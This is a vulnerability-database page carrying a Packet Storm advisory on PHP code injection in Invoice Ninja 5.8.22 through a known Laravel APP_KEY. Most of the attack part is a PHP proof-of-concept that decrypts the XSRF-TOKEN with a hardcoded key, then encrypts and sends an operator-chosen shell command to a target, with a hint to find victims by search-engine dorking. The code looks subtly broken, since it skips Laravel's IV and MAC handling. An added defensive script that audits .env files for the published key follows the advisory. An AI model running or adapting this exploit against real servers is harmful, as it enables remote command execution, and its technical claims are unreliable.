
📄 Invoice Ninja 5.8.22 PHP Code Injection

🗓️ 17 Dec 2025 00:00:00 · Reported by indoushka · Type: packetstorm · 🔗 packetstorm.news · 👁 191 Views

Invoice Ninja 5.8.22 PHP code injection vulnerability exposed via Laravel APP_KEY.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Invoice Ninja 5.10.10 Insecure Deserialization / Remote Code Execution Exploit | 25 Feb 2025 00:00 | zdt |
| GithubExploit | Exploit for CVE-2024-55555 | 31 Jul 2025 23:46 | githubexploit |
| Circl | CVE-2024-55555 | 7 Jan 2025 16:43 | circl |
| CNNVD | Invoice Ninja code issue vulnerability | 7 Jan 2025 00:00 | cnnvd |
| CVE | CVE-2024-55555 | 7 Jan 2025 00:00 | cve |
| Cvelist | CVE-2024-55555 | 7 Jan 2025 00:00 | cvelist |
| Metasploit | Invoice Ninja unauthenticated PHP Deserialization Vulnerability | 25 Feb 2025 18:53 | metasploit |
| NVD | CVE-2024-55555 | 7 Jan 2025 17:15 | nvd |
| Packet Storm | Invoice Ninja 5.10.10 Insecure Deserialization / Remote Code Execution | 25 Feb 2025 00:00 | packetstorm |
| Positive Technologies | PT-2024-36551 · Unknown · Invoice Ninja | 13 Dec 2024 00:00 | ptsecurity |

=============================================================================================================================================
    | # Title     : Invoice Ninja v 5.8.22 PHP Code Injection Vulnerability                                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://invoiceninja.com/                                                                                                   |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or other search engine.
    
    [+] Code Description: A vulnerability in Invoice Ninja can also be exploited via a non-proficient character control attack using Laravel APP_KEY.
    
       (Related : https://packetstorm.news/files/id/189419/ Related CVE numbers: CVE-2024-55555) .
    	
    [+] save code as poc.php.
    
    [+] line 85 set target.
    
    [+] Usage = php poc.php
    
    [+] PayLoad :
    
    <?php
    
    // Define the function that will execute the command
    function execute_command($url, $command, $app_key) {
        $cipher_mode = 'AES-256-CBC';
    
        // Send the GET request to the endpoint
        $response = send_request($url, 'GET', 'application/x-www-form-urlencoded', 'login');
    
        if ($response['code'] != 200) {
            die("لا يوجد استجابة صالحة من الهدف.");
        }
    
        // Decrypt using APP_KEY
        $xsrf_token = extract_xsrf_token($response['cookies']);
        if (!$xsrf_token) {
            die("لم يتم العثور على XSRF-TOKEN.");
        }
    
        $decrypted_value = laravel_decrypt($xsrf_token, $app_key, $cipher_mode);
        if (!$decrypted_value) {
            die("فك التشفير باستخدام APP_KEY فشل.");
        }
    
        echo "APP_KEY صالح: " . $app_key . "\n";
        echo "القيمة المفكوكة: " . $decrypted_value . "\n";
    
        // Prepare the encrypted payload
        $payload = base64_encode($command);  // replace with your own payload
        $encrypted_payload = laravel_encrypt($payload, $app_key, $cipher_mode);
    
        if (!$encrypted_payload) {
            die("فشل التشفير باستخدام Laravel.");
        }
    
        // Execute the command
        send_request($url, 'GET', 'application/x-www-form-urlencoded', "route/$encrypted_payload");
    }
    
    // Request-sending function
    function send_request($url, $method, $content_type, $endpoint) {
        $ch = curl_init();
    
        curl_setopt($ch, CURLOPT_URL, $url . $endpoint);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HTTPHEADER, [
            'Content-Type: ' . $content_type
        ]);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
    
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $cookies = curl_getinfo($ch, CURLINFO_COOKIELIST);
    
        curl_close($ch);
    
        return ['code' => $http_code, 'cookies' => $cookies, 'response' => $response];
    }
    
    // Function to extract XSRF-TOKEN from the cookies
    function extract_xsrf_token($cookies) {
        foreach ($cookies as $cookie) {
            if (strpos($cookie, 'XSRF-TOKEN') !== false) {
                preg_match('/XSRF-TOKEN=([^;]+)/', $cookie, $matches);
                return $matches[1];
            }
        }
        return null;
    }
    
    // Decryption function
    function laravel_decrypt($ciphertext, $key, $cipher_mode) {
        // The AES algorithm can be used here for decryption
        // Use PHP's OpenSSL library for this purpose
        return openssl_decrypt(base64_decode($ciphertext), $cipher_mode, base64_decode($key), OPENSSL_RAW_DATA);
    }
    
    // Encryption function
    function laravel_encrypt($plaintext, $key, $cipher_mode) {
        // Use PHP's OpenSSL library for encryption
        return openssl_encrypt($plaintext, $cipher_mode, base64_decode($key), OPENSSL_RAW_DATA);
    }
    
    // Call the functions with the appropriate values
    $url = "https://target.com";
    $app_key = "base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=";
    $command = "ls -la";  // replace with the desired command
    execute_command($url, $command, $app_key);
    
    ?>
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
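
A defensive check for the condition this advisory depends on, an APP_KEY that is already known outside the deployment. This PHP 8 script is an added example, not part of the advisory or of Invoice Ninja; the function names and sample `.env` contents are constructed for illustration, and the only key it lists is the one printed in the PoC above.

```php
<?php
// Keys known to be public. The single entry is the key printed in the PoC on
// this page; extend the list with other published keys you track.
const PUBLISHED_APP_KEYS = ['base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno='];

// Return the raw APP_KEY value from .env text, or null when it is unset.
function read_app_key(string $envText): ?string {
    if (!preg_match('/^\s*APP_KEY\s*=\s*(.*)$/m', $envText, $m)) {
        return null;
    }
    $value = trim(trim($m[1]), "\"'");   // .env values may be quoted
    return $value === '' ? null : $value;
}

// Decode the key as Laravel does: a "base64:" prefix marks base64-encoded bytes.
function decode_app_key(string $value): string|false {
    return str_starts_with($value, 'base64:')
        ? base64_decode(substr($value, 7), true)
        : $value;
}

// Return a list of findings; an empty list means nothing was flagged.
function audit_app_key(string $envText): array {
    $value = read_app_key($envText);
    if ($value === null) {
        return ['APP_KEY is missing or empty'];
    }
    $findings = [];
    if (in_array($value, PUBLISHED_APP_KEYS, true)) {
        $findings[] = 'APP_KEY matches a publicly known key: rotate it';
    }
    $raw = decode_app_key($value);
    if ($raw === false) {
        $findings[] = 'APP_KEY has a base64: prefix but is not valid base64';
    } elseif (strlen($raw) !== 32) {
        $findings[] = 'APP_KEY is ' . strlen($raw) . ' bytes; AES-256-CBC needs 32';
    }
    return $findings;
}

// Constructed sample .env contents, not taken from any real deployment.
$samples = [
    'published key' => "APP_NAME=\"Invoice Ninja\"\nAPP_KEY=base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=\n",
    'fresh key'     => "APP_KEY=base64:" . base64_encode(random_bytes(32)) . "\n",
    'short key'     => "APP_KEY=changeme\n",
];
foreach ($samples as $label => $env) {
    $findings = audit_app_key($env);
    echo $label . ': ' . ($findings ? implode('; ', $findings) : 'ok') . PHP_EOL;
}
```

A match means the key has to be rotated (`php artisan key:generate`), which also invalidates existing sessions and any data encrypted under the old key.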


17 Dec 2025 00:00 (current)
Vulners AI Score: 7.7 (High risk)
CVSS 3.1: 8.8
EPSS: 0.065